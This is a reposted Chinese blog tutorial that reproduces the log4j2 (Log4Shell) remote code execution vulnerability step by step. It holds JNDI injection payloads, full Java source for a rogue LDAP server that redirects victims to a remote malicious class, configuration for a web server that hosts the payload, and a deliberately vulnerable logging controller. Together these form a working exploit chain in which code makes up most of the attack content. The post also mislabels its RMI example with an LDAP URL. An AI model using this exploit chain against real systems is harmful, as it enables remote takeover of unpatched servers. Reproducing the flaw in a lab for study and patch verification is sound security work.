ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

【漏洞】log4j2远程执行代码复现实操代码

2021-12-11 16:58:42  阅读:236  来源: 互联网

标签:com 代码 appender 漏洞 org apache import log4j2 log4j


如何复现log4j2远程执行代码漏洞

漏洞原理

在这里插入图片描述
1.攻击伪装一个请求体,里面含有JNDI可执行的服务,我这里主要是试了LDAP与RMI两种,请求URL如下:

  • LADP: ${jndi:ldap://127.0.0.1:1389/hello}
  • RMI: ${jndi:ldap://127.0.0.1:1389/hello}

2.在应用程序恰巧输出了请求头或者入参的log日志时,就会触发此URL的请求,并主动请求了攻击者准备的LADP/RMI服务

3.利用LADP/RMI的特性,我们可以伪装返回值,含有要执行的恶意Class文件地址,与Class类名

4.被攻击的服务器找不到对应CLass文件就会触发JNDI的机制从远程服务器中下载Class中

5.用我们事先准备好的web服务给被攻击服务器提供可执行Class文件下载,被攻击服务器拿到到Class文件后会触发反序列化执行代码,达到了远程执行代码的目的

漏洞复现

  1. 我们先准备一个无辜的被攻击服务器(肉鸡1号)

使用 jdk1.8.0_102 ,为什么是低版本?因为我目前使用的版本 jdk1.8_201根本不会触发此BUG,里面做了个判断!不java让反序列化了
所以得用一个低版本jdk 低于 191的就行
在这里插入图片描述
pom引用log4j

  <!-- 引入log4j开始 -->
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-log4j2</artifactId>
        </dependency>
        <!-- 引入log4j结束 -->

log4j.properties文件内容

log4j.rootLogger=DEBUG, CONSOLE, ERROR, WARN, INFO, DEBUG, ALL
#-----------------------------------------------------------------------------------------------------
log4j.appender.CONSOLE=org.apache.log4j.ConsoleAppender 
log4j.appender.CONSOLE.Target=System.out
log4j.appender.CONSOLE.layout=org.apache.log4j.PatternLayout
log4j.appender.CONSOLE.layout.ConversionPattern=[%-5p] %d{yyyy-MM-dd HH:mm:ss,SSS} method:%l%n%m%n
#-----------------------------------------------------------------------------------------------------
log4j.logger.ERROR=ERROR
log4j.appender.ERROR=org.apache.log4j.DailyRollingFileAppender
log4j.appender.ERROR.File=logs/error/error.log
log4j.appender.ERROR.Threshold=ERROR 
log4j.appender.ERROR.Append=true
log4j.appender.ERROR.layout=org.apache.log4j.PatternLayout
log4j.appender.ERROR.layout.ConversionPattern=%-d{yyyy-MM-dd HH:mm:ss}  [ %t:%r ] - [ %p ]  %m%n
#-----------------------------------------------------------------------------------------------------
log4j.logger.WARN=WARN
log4j.appender.WARN=org.apache.log4j.DailyRollingFileAppender
log4j.appender.WARN.File=logs/warn/warn.log
log4j.appender.WARN.Threshold=WARN
log4j.appender.WARN.Append=true
log4j.appender.WARN.layout=org.apache.log4j.PatternLayout
log4j.appender.WARN.layout.ConversionPattern=%-d{yyyy-MM-dd HH:mm:ss}  [ %t:%r ] - [ %p ]  %m%n
#-----------------------------------------------------------------------------------------------------
log4j.logger.INFO=INFO
log4j.appender.INFO=org.apache.log4j.DailyRollingFileAppender
log4j.appender.INFO.File=logs/info/info.log
log4j.appender.INFO.Threshold=INFO 
log4j.appender.INFO.Append=true
log4j.appender.INFO.layout=org.apache.log4j.PatternLayout
log4j.appender.INFO.layout.ConversionPattern=%-d{yyyy-MM-dd HH:mm:ss}  [ %t:%r ] - [ %p ]  %m%n
#-----------------------------------------------------------------------------------------------------
log4j.logger.DEBUG=DEBUG
log4j.appender.DEBUG=org.apache.log4j.DailyRollingFileAppender
log4j.appender.DEBUG.File=logs/debugger/debugger.log
log4j.appender.DEBUG.Threshold=DEBUG
log4j.appender.DEBUG.Append=true
log4j.appender.DEBUG.layout=org.apache.log4j.PatternLayout
log4j.appender.DEBUG.layout.ConversionPattern=%-d{yyyy-MM-dd HH:mm:ss}  [ %t:%r ] - [ %p ]  %m%n
#-----------------------------------------------------------------------------------------------------
log4j.logger.ALL=ALL
log4j.appender.ALL=org.apache.log4j.DailyRollingFileAppender
log4j.appender.ALL.File=logs/all/all.log
log4j.appender.file.DatePattern='.'yyyy-MM-dd
log4j.appender.ALL.Threshold=ALL 
log4j.appender.ALL.Append=true
log4j.appender.ALL.layout=org.apache.log4j.PatternLayout
log4j.appender.ALL.layout.ConversionPattern=%-d{yyyy-MM-dd HH:mm:ss}  [ %t:%r ] - [ %p ]  %m%n

  1. 准备一个伪装的LADP/RMI服务端(伪装者1号)

在这里插入图片描述

package com.duanxd.ldapclient.ldap;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;

import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.net.InetAddress;
import java.net.URL;

/**
 * 说明:伪装者1号
 *
 * @author 肉段_Dxd
 */
public class ldapTest {

    private static final String LDAP_BASE = "dc=example,dc=com";

    public static void main(String[] argsx) {
        String[] args = new String[]{"http://127.0.0.1:80/#Calc"};
        int port = 1389;

        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen",
                    InetAddress.getByName("0.0.0.0"),
                    port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[0])));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port);
            ds.startListening();

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;

        public OperationInterceptor(URL cb) {
            this.codebase = cb;
        }

        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            } catch (Exception e1) {
                e1.printStackTrace();
            }
        }

        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws Exception {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "Calc");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if (refPos > 0) {
                cbstring = cbstring.substring(0, refPos);
            }

            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("objectClass", "javaNamingReference");
            e.addAttribute("javaFactory", this.codebase.getRef());
            result.sendSearchEntry(e);

            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }
    }

}

  1. 准备一个提供可执行的class文件的web服务(伪装者2号)
    在这里插入图片描述
    这个web服务就是个普通的web服务,设置一下端口与静态资源的目录,我们就可以将需要远程执行的class放入到static目录下,静静的等待人来远程下载它
server.port=80
spring.web.resources.static-locations=classpath:static/

4.启动伪装者1号
在这里插入图片描述
启动成功后会输出IP与端口号,说明启动成功了
pom需要引用一个jar,就可以启动一个ldap服务了

   <!-- https://mvnrepository.com/artifact/com.unboundid/unboundid-ldapsdk -->
        <dependency>
            <groupId>com.unboundid</groupId>
            <artifactId>unboundid-ldapsdk</artifactId>
            <version>6.0.3</version>
            <scope>test</scope>
        </dependency>

5.编译需要远程执行的代码

  • 找到你电脑的JDK 执行javac 把Calc.java编译成Calc.class 注意java里不要写 包路径(此处想起了最开始学习java的时候,永远在报错)
    在这里插入图片描述
    让后将编译后Calc.class文件放入到 准备好的伪装者2号的 static目录下,等待 肉鸡1号 的下载

6.启动伪装者2号
在这里插入图片描述
可以自己测试一下,启动后的服务路径加上/Calc.class 是否能触发浏览器下载不,能触发下载说明就ok了,等着 肉鸡1号 来下载就好了!

7.启动肉鸡1号
就正常的boot启动就行!等待着调用!

package com.dxd.testlog4jbuga.controller;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

import javax.servlet.http.HttpServletRequest;


/**
 * 说明:肉鸡1号
 *
 * @author 肉段_Dxd
 */
@RestController
@RequestMapping()
public class TestLogController {

    public static Logger logger = LoggerFactory.getLogger(TestLogController.class);

    /**
     * 测试被攻击
     *
     * @return 响应服务
     */
    @PostMapping("/go")
    public String go(HttpServletRequest request, String url) {
        // 获取请求头中的对象,我们这里随便定义dxd属性装我们的 URL
        String headerAuthorization = request.getHeader("dxd");
        logger.info("进来了");
        logger.info("收到" + headerAuthorization);
        logger.info("出去了");
        return headerAuthorization;
    }


}

8.使用PostMen请求肉鸡1号,触发远程代码执行
在headers中写一个自定义的key,恰巧 肉鸡1号 也取了这个dxd的key,一切就这么巧合,肉鸡1号,还用log输出了一下呢!
在这里插入图片描述

9.就可以看到 肉鸡1号 的服务器触发了计算器,至于为啥都是计算器,我也不知道!那就跟风也计算器吧!
在这里插入图片描述

源码地址:
链接:https://pan.baidu.com/s/1UbM4J7DZY1XkkxeXMivEQw
提取码:xgvc

漏洞范围

2.0 <= Apache log4j2 <= 2.14.1

我自测使用jdk1.8.0_201 不会触发此BUG
肉鸡1号使用 jdk1.8.0_102 可以复现此BUG,应该是是 191版本前的才会触发
所以使用201版本jdk的小伙伴们,不用慌!
使用 spring boot架构的同学,如果使用的 Spring默认的 logback也不用慌!
昨天我查了公司所有的boot架构的项目,发现只有一位同事单独引入了 log4j的jar
但是因为使用的jdk为201所以这漏洞也不用处理了

后续想到什么,就在再补,要陪怀孕的媳妇下楼遛弯了!

标签:com,代码,appender,漏洞,org,apache,import,log4j2,log4j
来源: https://blog.csdn.net/dxd5862/article/details/121873621

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有